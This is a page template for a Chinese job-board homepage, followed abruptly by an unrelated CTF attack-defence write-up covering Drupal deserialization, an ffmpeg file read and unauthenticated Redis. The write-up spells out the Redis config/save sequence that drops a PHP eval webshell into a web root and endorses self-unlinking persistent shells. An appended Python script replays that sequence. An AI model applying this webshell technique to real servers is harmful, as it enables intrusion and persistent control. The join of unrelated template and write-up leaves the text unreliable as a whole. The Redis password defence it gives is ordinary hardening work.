{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- ad: floor ad 1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="顯示數(shù)目:4,調(diào)用名稱:QS_floor_img2,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- floor 3 -->
<div class="floor-item">
<div class="floor-title"><em>3F</em><span>{#"QS_jobs,117"|qishi_categoryname#} · {#"QS_jobs,120"|qishi_categoryname#} · {#"QS_jobs,121"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- categories -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,類型:QS_jobs_floor,顯示數(shù)目:20,id:117_120_121"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:116|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- jobs -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,顯示數(shù)目:10,顯示職位:3,職位分類:117_120_121"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- ad: floor ad 1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="顯示數(shù)目:4,調(diào)用名稱:QS_floor_img3,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- floor 4 -->
<div class="floor-item">
<div class="floor-title"><em>4F</em><span>{#"QS_jobs,97"|qishi_categoryname#} · {#"QS_jobs,98"|qishi_categoryname#} · {#"QS_jobs,99"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- categories -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,類型:QS_jobs_floor,顯示數(shù)目:20,id:97_98_99"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:96|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- jobs -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,顯示數(shù)目:10,顯示職位:3,職位分類:97_98_99"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- ad: floor ad 1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="顯示數(shù)目:4,調(diào)用名稱:QS_floor_img4,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- floor 5 -->
<div class="floor-item">
<div class="floor-title"><em>5F</em><span>{#"QS_jobs,50"|qishi_categoryname#} · {#"QS_jobs,51"|qishi_categoryname#} · {#"QS_jobs,52"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- categories -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,類型:QS_jobs_floor,顯示數(shù)目:20,id:50_51_52"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:49|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- jobs -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,顯示數(shù)目:10,顯示職位:3,職位分類:50_51_52"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- ad: floor ad 1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="顯示數(shù)目:4,調(diào)用名稱:QS_floor_img5,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
</div>
</div>
<!-- list: job navigation end -->
<!-- list: workplace news -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">職場(chǎng)資訊<span>Workplace Information</span></h4>
<a href="{#"QS_news"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="job-news-block clearfix">
<div class="jn-left f-left">
{#qishi_news_category set="列表名:newscategory,資訊大類:1,顯示數(shù)目:4"#}
{#section loop=$newscategory name=nclist#}
<div class="jn-box f-left">
<div class="jn-img f-left"><a href="{#"QS_newslist,id:$newscategory[nclist].id"|qishi_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/news{#$smarty.section.nclist.index#}.jpg" /></a></div>
<ul class="jn-list f-left">
{#qishi_news_list set="列表名:topnews,顯示數(shù)目:4,標(biāo)題長(zhǎng)度:18,資訊小類:$newscategory[nclist].id,摘要長(zhǎng)度:36,填補(bǔ)字符:...,排序:id>desc"#}
{#foreach from=$topnews item=toplist#}
<li><i class="jn-icon"></i><a href="{#$toplist.url#}" class="underline" title="{#$toplist.title_#}" target="_blank">{#$toplist.title#}</a></li>
{#/foreach#}
</ul>
</div>
{#/section#}
</div>
<ol class="jn-right f-left">
{#qishi_news_list set="列表名:news_list,顯示數(shù)目:8,標(biāo)題長(zhǎng)度:12,填補(bǔ)字符:...,排序:click>desc"#}
{#section loop=$news_list name=nclist start=1#}
<li><span>{#$smarty.section.nclist.index#}</span><a href="{#$news_list[nclist].url#}" class="underline" target="_blank">{#$news_list[nclist].title#}</a></li>
{#/section#}
</ol>
</div>
</div>
<!-- list: workplace news end -->
<!-- list: friendly links -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">友情鏈接<span>Friendly Link</span></h4>
<a href="{#$QISHI.site_dir#}link/add_link.php" target="_blank" class="f-right underline">申請(qǐng)>></a>
</div>
<div class="friendly-link">
{#qishi_link set="列表名:link,顯示數(shù)目:100,調(diào)用名稱:QS_index,類型:1"#}
{#foreach from=$link item=list#}
<a href="{#$list.link_url#}" target="_blank" class="underline">{#$list.title#}</a>
{#/foreach#}
</div>
{#qishi_link set="列表名:imglink,顯示數(shù)目:14,調(diào)用名稱:QS_index,類型:2"#}
{#if $imglink#}
<div class="link_img">
{#foreach from=$imglink item=list#}
<div class="l_img"><a href="{#$list.link_url#}" target="_blank"><img src="{#$list.link_logo#}" /></a> </div>
{#/foreach#}
<div class="clear"></div>
</div>
{#/if#}
</div>
<!-- list: friendly links end -->
</div>
<!-- main body end -->
{#include file="footer.htm"#}
</body>
</html>
Third challenge: easyCMS
- Also a server misconfiguration exposing partial directory listings.
- Browsing into the templates/admin directory, the page title is a flag.
- No further ideas on this one, Orz. I hope someone more experienced can explain it.
The afternoon AWD was, as expected, another web challenge.
Around that one web challenge the organisers exposed three services: HTTP on port 80, a Python-served HTTP service on port 8888, and Redis on port 6379.
Each of the three carried one hole (confirmed with the organisers after the event).
According to the pre-competition notice, the way to get the flag was to run the getkey program in /usr/tmp, which prints it; but afterwards the challenge author admitted there was another place holding the flag in plaintext.

Port 80 was a Drupal deserialization vulnerability, see https://paper.seebug.org/334/?spm=5176.app55885.3.2.XT8Apf
Defense: change the admin password promptly.

Port 8888 was an ffmpeg arbitrary file read. At first I could not see what it was good for, and when I asked the author afterwards he said he had not planned this use either: the server also had a virtual disk mounted that held the flag in plaintext, so this bug could read it directly. // Personally I think this hole could not really be patched at all, since we did not have the permissions for it, so everyone will understand what that meant.
Defense: thinking about it afterwards, one could script endless requests to the del action to delete the file, but that is a race: the operator box and the other teams' attack boxes sit on the same flat network, so if the other side scripts its requests too you will not necessarily win.

Port 6379 was the Redis service, and it is the hole I used to attack. This afternoon I did something dumb again. After ps aux showed Redis I happily connected: no password required. The info command reports the config file at /var/lib/redis/6379/xxx; reading my own config showed several commands renamed or removed, for example migrate and flushdb, with config renamed to ccccooonnnnfig and shutdown renamed to shutdown_123. I set a password on my own instance, then in a fit of cleverness went and took down most other teams' Redis, expecting to rake in points... only to realise that this AWD had no checker!!! Collapse, Orz. Later it turned out that some teams had even taken down their own port 80 service (no idea how, since without privilege escalation there is no permission for that).
What Redis is actually good for here is arbitrary file write: it runs as root, and its save command dumps the in-memory key/value pairs to a file, so the following sequence writes a shell:
> ccccooonnnnfig set dir /var/www/html/drupal8/
> ccccooonnnnfig set dbfilename Pr0ph3t.php
> set Pr0ph3t "<?php @eval($_POST['yoooooo']); ?>"
> save
After save runs, Redis writes Pr0ph3t.php into the port-80 web root. The file is an RDB dump, so it begins with the REDIS magic and wraps the payload in binary junk, but PHP only interprets what sits between <?php and ?>, so the shell still works.
Then a reverse shell and so on; the shell runs as the daemon user (the web server's account, not root, even though Redis wrote the file as root).
I recommend a self-unlinking persistent shell (a 不死馬) here, so the file does not sit around exposing that it was written through Redis.
Defense: require a password on Redis with the following command:
> ccccooonnnnfig set requirepass yourpassword
This takes effect immediately, with no restart. Two caveats: a runtime config set is not written back to the config file unless you also run ccccooonnnnfig rewrite, so it is lost on restart, and clients that are already connected keep their access, so anyone who got in before you set the password is not kicked out.
Further reading: https://www.leavesongs.com/penetration/write-webshell-via-redis-server.html
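As an added example, the write-shell sequence and the requirepass defense above in code. This is not from the post and it is not Redis: the client half speaks real RESP, exactly what redis-cli puts on the wire, while the server half is a small stand-in that implements only the commands the sequence needs, the renamed CONFIG command, requirepass and a simplified dump file. The web root is a scratch directory standing in for /var/www/html/drupal8/, the password s3cret is made up, and the dump layout is a placeholder rather than the real RDB format.

```python
import os
import tempfile

# Added example, not from the post and not Redis itself. The client side
# speaks real RESP; the server side is a tiny stand-in that only understands
# CONFIG SET / SET / SAVE / AUTH, honours a renamed CONFIG command and a
# requirepass, and writes a simplified dump (the real RDB layout is binary
# and differs, but the property that matters survives: the value is stored
# verbatim inside junk that PHP ignores outside <?php ... ?>).


def resp_encode(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings (what redis-cli sends)."""
    out = [f"*{len(args)}\r\n".encode()]
    for a in args:
        b = a.encode()
        out.append(f"${len(b)}\r\n".encode() + b + b"\r\n")
    return b"".join(out)


def resp_decode(data: bytes):
    """Decode a simple-string, error, or array-of-bulk-strings reply."""
    kind, body = data[:1], data[1:].split(b"\r\n")
    if kind == b"+":
        return body[0].decode()
    if kind == b"-":
        raise RuntimeError(body[0].decode())
    if kind == b"*":
        n, items, i = int(body[0]), [], 1
        while len(items) < n:          # body[i] is "$len", body[i+1] the data
            items.append(body[i + 1].decode())
            i += 2
        return items
    raise ValueError("unsupported reply type")


class FakeRedis:
    """Stand-in for a root-run Redis: it writes wherever 'dir' points."""

    def __init__(self, config_cmd="CONFIG"):
        self.config_cmd = config_cmd.upper()      # rename-command target
        self.kv, self.dir, self.dbfilename = {}, ".", "dump.rdb"
        self.requirepass, self.authed = None, True

    def new_connection(self):
        """A fresh client must AUTH once requirepass is set (existing ones keep access)."""
        self.authed = self.requirepass is None

    def handle(self, raw: bytes) -> bytes:
        parts = [p.decode() for p in raw.split(b"\r\n")[2::2] if p]   # bulk payloads
        cmd, args = parts[0].upper(), parts[1:]
        if self.requirepass and not self.authed and cmd != "AUTH":
            return b"-NOAUTH Authentication required.\r\n"
        if cmd == "AUTH":
            self.authed = args[0] == self.requirepass
            return b"+OK\r\n" if self.authed else b"-ERR invalid password\r\n"
        if cmd == "CONFIG" and self.config_cmd != "CONFIG":
            return b"-ERR unknown command 'config'\r\n"   # the rename hides the original
        if cmd == self.config_cmd and args[0].upper() == "SET":
            key, val = args[1], args[2]
            if key == "dir":
                self.dir = val
            elif key == "dbfilename":
                self.dbfilename = val
            elif key == "requirepass":
                self.requirepass = val
            return b"+OK\r\n"
        if cmd == "SET":
            self.kv[args[0]] = args[1]
            return b"+OK\r\n"
        if cmd == "SAVE":
            with open(os.path.join(self.dir, self.dbfilename), "wb") as fh:
                fh.write(b"REDIS0007\xfe\x00")            # placeholder, not real RDB
                for k, v in self.kv.items():
                    fh.write(b"\x00" + k.encode() + b"\x00" + v.encode())
                fh.write(b"\xff")
            return b"+OK\r\n"
        return b"-ERR unknown command\r\n"


def demo(config_cmd="ccccooonnnnfig") -> dict:
    """Replay the writeup's write-shell sequence, then lock the instance down."""
    webroot = tempfile.mkdtemp()                   # stands in for /var/www/html/drupal8/
    srv = FakeRedis(config_cmd)
    payload = "<?php @eval($_POST['yoooooo']); ?>"
    sequence = [(config_cmd, "set", "dir", webroot),
                (config_cmd, "set", "dbfilename", "Pr0ph3t.php"),
                ("set", "Pr0ph3t", payload),
                ("save",)]
    replies = [resp_decode(srv.handle(resp_encode(*c))) for c in sequence]
    with open(os.path.join(webroot, "Pr0ph3t.php"), "rb") as fh:
        dump = fh.read()
    # defense from the writeup: requirepass at runtime, no restart needed
    resp_decode(srv.handle(resp_encode(config_cmd, "set", "requirepass", "s3cret")))
    srv.new_connection()
    try:
        resp_decode(srv.handle(resp_encode("set", "x", "y")))
        blocked = False
    except RuntimeError as exc:
        blocked = str(exc).startswith("NOAUTH")
    resp_decode(srv.handle(resp_encode("auth", "s3cret")))
    try:                                            # original name stays dead after rename
        resp_decode(srv.handle(resp_encode("config", "set", "dir", "/tmp")))
        renamed_hidden = False
    except RuntimeError:
        renamed_hidden = True
    return {"replies": replies,
            "dump_starts_with_redis": dump.startswith(b"REDIS"),
            "payload_in_dump": payload.encode() in dump,
            "blocked_without_auth": blocked,
            "original_config_rejected": renamed_hidden}
```

Pointing the same encoder at a real server is a matter of writing resp_encode(...) to a TCP socket on 6379 and reading the reply back; the FakeRedis class exists only so the sequence and the lock-down can be exercised offline. Note that the rename does nothing against someone who has read the config file, which is exactly how the renamed name was learned here.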
In closing:
As for how this competition felt... everyone has their own idea about that... I will say no more.